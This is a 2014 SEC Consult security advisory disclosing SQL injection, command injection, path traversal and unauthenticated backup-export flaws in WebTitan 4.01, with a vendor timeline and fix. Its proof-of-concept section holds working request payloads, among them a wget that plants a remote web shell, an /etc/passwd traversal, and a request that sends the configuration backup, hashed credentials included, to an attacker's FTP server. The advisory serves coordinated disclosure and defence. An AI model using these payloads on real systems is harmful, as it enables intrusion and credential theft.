Multiple critical vulnerabilities in WebTitan

SEC Consult Vulnerability Lab Security Advisory < 20140606-0 >

=======================================================================

title: Multiple critical vulnerabilities

product: WebTitan

vulnerable version: 4.01 (Build 68)

fixed version: 4.04

impact: critical

homepage: www.webtitan.com

found: 2014-04-07

by: Robert Giruckas, Mindaugas Liudavicius

SEC Consult Vulnerability Lab

www.sec-consult.com

=======================================================================

 

Vendor description:

-------------------

"WebTitan offers ultimate protection from internet based threats and powerful

web filtering functionalities to SMBs, Service Providers and Education sectors

around the World."

 

Source: www.webtitan.com/about-us/webtitan

 

 

Business recommendation:

------------------------

Multiple critical security vulnerabilities have been identified in the WebTitan

system. Exploiting these vulnerabilities potential attackers could take control

over the entire system.

 

It is highly recommended by SEC Consult not to use this software until a

thorough security review has been performed by security professionals and all

identified issues have been resolved.

 

 

Vulnerability overview/description:

-----------------------------------

1) SQL Injection

A SQL injection vulnerability in the /categories-x.php script allows

unauthenticated remote attackers to execute arbitrary SQL commands via the

"sortkey" parameter.

 

2) Remote command execution

Multiple remote command execution vulnerabilities were detected in the

WebTitan GUI. This security flaw exists due to lack of input validation. An

authenticated attacker of any role (Administrator, Policy Manager, Report

Manager) can execute arbitrary OS commands with the privileges of the web

server.

 

3) Path traversal

The web GUI fails to properly filter user input passed to the logfile

parameter. This leads to arbitrary file download by unauthenticated attackers.

 

4) Unprotected Access

The web GUI does not require authentication for certain PHP scripts. This

security issue allows an unauthenticated remote attacker to download Webtitan

configuration backup (including hashed user credentials) to the attacker's FTP

server.

 

 

Proof of concept:

-----------------

1) SQL Injection

The manipulation of the "sortkey" parameter allows users to modify the

original SQL query.

    GET /categories-x.php HTTP/1.1
    /categories-x.php?getcategories&sortkey=name) limit 1;--
    /categories-x.php?getcategories&sortkey=name) limit 5;--

 

2) Remote command execution

Due to improper user input validation it is possible to inject arbitrary OS

commands using backticks ``. Some of the affected files do not sanitize any

type of shell metacharacters, this allows an attacker to use more flexible OS

commands. Tested and working payload for most scripts: `/usr/local/bin/wget

http:// <URL to shell script> -O /usr/blocker/www/graph/CPU/xshell.php`

 

Affected scripts: logs-x.php, users-x.php, support-x.php, time-x.php,

scheduledreports-x.php, reporting-x.php, network-x.php

 

  a. logs-x.php, vulnerable parameters: fname, logfile
        /logs-x.php?jaction=view&fname=webtitan.log;ls -la
        /logs-x.php POST Content: jaction=delete&logfile=<PAYLOAD>

    b. users-x.php, vulnerable parameters: ldapserver
       /users-x.php?findLdapDC=1&ldapserver=<PAYLOAD> 

    c. support-x.php, vulnerable parameters: tracehost, dighost, pinghost
        /support-x.php POST Content: jaction=ping&pinghost=<PAYLOAD>
        /support-x.php POST Content: jaction=ping&dighost=<PAYLOAD>
        /support-x.php POST Content: jaction=ping&tracehost=<PAYLOAD>

    d. time-x.php, vulnerable parameters: ntpserversList
       /time-x.php POST Content: jaction=ntpSync&timezone=Europe%2FLondon&ntp=1&ntpservers_entry=&date_month=4&date_day=8&date_year=2014&h_time=9&m_time=57&ntpserversList=<PAYLOAD>

    e. scheduledreports-x.php, vulnerable parameters: reportid
       /scheduledreports-x.php?runReport=1&reportid=<PAYLOAD>

    f. reporting-x.php, vulnerable parameter: delegated_admin
       /reporting-x.php POST Content: jaction=exportpdf&report=r_requests_user&period=period_today&uid=0&sourceip=0&urlid=0&groupid=0&categoryid=0&domain=&chart=pie&reporthtml=&reportid=1396860686&rowsperpage=10&currentpage=1&startdate=1396843200&enddate=1396929599&reportfilter=f_0&delegated_admin=admin';<PAYLOAD>'&gotopage=1
	
    g. network-x.php, vulnerable parameters: hostname (limited to 15 symbols
       length), domain
       jaction=saveHostname&hostname=`root`
       jaction=saveDNS&domain=domain.com;<PAYLOAD>&dnsservers=192.168.0.1-:-

 

 

3) Path traversal

Due to missing input filtering in the logs-x.php script it is possible to

download arbitrary files without any authentication:

 

Vulnerable parameters: logfile

Post Content: jaction=download&logfile=../../../etc/passwd

 

4) Unprotected Access

a. Since the script backup-x.php does not require authentication, remote

attackers can initiate a backup of Webtitan configuration files to a remote

FTP server by executing the following requests:

 

 /backup-x.php 
       POST Content: jaction=saveFTP&jstatus=&schedule=1&frequency=daily&hour=16&minute=38&day_of_week=Mon&day_of_month=1&ftpserver=<IP>&ftplogin=<login>&ftppassword=<pw>&ftplocation=<path>
       
       Where <IP> is the remote FTP server IP, <login> - remote FTP server
       login, <password> - remote FTP, <path> - path where to store backup
		
       With the next request, an attacker can force the backup to be uploaded 
       to the attacker's FTP server: 

       /backup-x.php
       POST Content: jaction=exportNowtoFtp

 

b. The autoconf-x.php, contentfiltering-x.php, license-x.php, msgs.php,

reports-drill.php scripts can be reached by an unauthenticated user. The

categories-x.php, urls-x.php can also be accessed by faking the HTTP User-Agent

header, by setting it to "Shockwave Flash".

 

 

Vulnerable / tested versions:

-----------------------------

The vulnerabilities have been verified to exist in the WebTitan VMware

appliance ver. 4.0.1 (build 68). It is assumed that previous versions are

affected too.

 

 

Vendor contact timeline:

------------------------

2014-04-17: Contacting vendor through info@webtitan.com and helpdesk@webtitan.com

2014-04-23: Vendor is investigating the vulnerabilities

2014-05-09: Vendor is testing security patches

2014-06-03: Vendor releases the version 4.04 of WebTitan

2014-06-06: SEC Consult releases a coordinated security advisory

 

 

Solution:

---------

Update to the most recent version 4.04 of WebTitan.

 

 

Workaround:

-----------

 

 

Advisory URL:

-------------

www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

 

SEC Consult

Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

 

Headquarter:

Mooslackengasse 17, 1190 Vienna, Austria

Phone: +43 1 8903043 0

Fax: +43 1 8903043 15

 

Mail: research at sec-consult dot com

Web: www.sec-consult.com

Blog: blog.sec-consult.com

Twitter: twitter.com/sec_consult

 

Interested to work with the experts of SEC Consult?

Write to career@sec-consult.com

 

EOF Mindaugas Liudavicius / @2014